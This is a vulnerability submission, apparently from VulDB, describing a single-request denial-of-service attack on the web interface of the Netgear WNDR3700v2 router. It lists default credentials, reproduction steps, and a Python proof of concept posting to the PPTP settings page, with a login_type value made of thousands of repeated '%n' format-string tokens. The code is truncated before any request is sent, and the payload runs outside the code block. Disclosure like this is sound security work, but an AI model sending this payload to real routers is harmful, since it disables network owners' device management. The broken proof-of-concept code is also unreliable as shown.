Submit #87904: DoS attack on the web management interface of Netgear router WNDR3700v2

Title: DoS attack on the web management interface of Netgear router WNDR3700v2
Description:

# DoS attack on the web triggered by only one request

## Overview of the Vulnerability

There exists a DoS attack on the web management interface of the Netgear router WNDR3700v2 (see https://www.netgear.com/support/product/WNDR3700v2.aspx, latest firmware version: x.x.x.x) that is triggered by a single crafted request. After the attack the web server crashes for about 1 minute and cannot respond to any visit. The attack is easy to perform and has a critical impact on the router device: one malformed request is enough to disable the router's web service.

## Business Impact

Application-level DoS can result in indirect financial loss for the business through the attacker's ability to DoS the application. These malicious actions could also result in reputational damage for the business through the impact on customers' trust.

## Steps to Reproduce

I have put the POC code in the next section (save the code into poc.py); configure several parameters, then execute the POC, and the web management service will be damaged. The parameters are as below:

1. username, password: credentials used to visit the device's web interface (default: admin, password).
2. device_web_ip: web IP address of the target device.

After executing the POC script, try to visit the router web management interface (or run 'telnet device_web_ip 80'); you will find that the web service goes down.
## Proof of Concept (POC)

```python
import requests
import socket
import re
import time
from urllib.parse import urlencode

username = 'admin'
password = 'password'
device_web_ip = '192.168.1.1'

# Request headers ('HEAD') and form parameters ('PARAM') of the crafted
# submission to the PPTP WAN settings page (BAS_pptp.htm).
request = {
    'HEAD': {
        'Host': '{}'.format(device_web_ip),
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Origin': 'http://127.0.0.1:8081',
        #'Authorization': 'Basic YWRtaW46cGFzc3dvcmQ=',
        'Connection': 'keep-alive',
        'Referer': 'http://127.0.0.1:8081/BAS_pptp.htm',
        'Upgrade-Insecure-Requests': '1'
    },
    'PARAM': {
        'submit_flag': 'pptp',
        'change_wan_type': 0,
        'run_test': 'no',
        'pptp_myip': '192.168.55.5',
        'pptp_gateway': '192.168.55.6',
        'pptp_subnet': 'x.x.x.x',
        'pptp_dnsaddr1': '192.168.55.1',
        'pptp_dnsaddr2': '192.168.55.2',
        'hidden_pptp_idle_time': 5,
        'conflict_wanlan': '',
        'hid_mtu_value': 1436,
        'hid_pptp_dod': 1,
        'login_type':
```
'PPTP"%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n
""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n
""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n
""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n"
User: leetsun (UID 39457)
Submission: 02/12/2023 02:06 (3 years ago)
Moderation: 02/15/2023 22:45 (4 days later)
Status: Accepted
VulDB entry: 221153 [Netgear WNDR3700v2 1.0.1.14 Web Interface denial of service]
Points: 17
